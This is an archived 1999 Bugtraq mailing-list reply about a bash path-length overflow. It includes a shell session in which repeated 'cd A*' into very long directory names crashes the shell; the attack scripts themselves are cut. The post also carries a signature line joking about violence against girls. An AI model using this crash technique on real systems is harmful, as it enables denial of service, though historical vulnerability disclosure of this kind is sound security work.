This is the bash path overlow (up to 2.0.0) which has been fixed in bash v2.02. See bugtraq archive, http://geek-girl.com/bugtraq/1998_3/0765.html ga ---------- From: Ultor <Ultorat_private> To: BUGTRAQat_private Subject: Re: Pro/wuFTPD DoS Date: 13 February 1999 18:18 Hi > yes, > > kills patched ProFTPD dead. > > -----snip----- > > #!/usr/local/bin/perl > # ftpd thingy > # bubbaat_private [CUTED] > -----snip----- > > Ken Williams > jkwilli2at_private Hmmm i think that the problem here isn't overflow in ProFTPD. Here is a proof. first run attached 'sux' to make directories ... ----- snip ------- # pwd /mnt/ # ./sux ok now just cd that directories # cd A* [CUTED] # cd A* ultor:/mnt/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA # cd A* Welcome to Linux 2.0.35. ultor login: ----- snip ------- nice heh :) Greeetz ------------------------------------------------------------- "I hack the heads off little girls and put them on my wall" ULT0R [Ultorat_private] - NETWORK SECURITY ADVISER ----------
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:35:01 PDT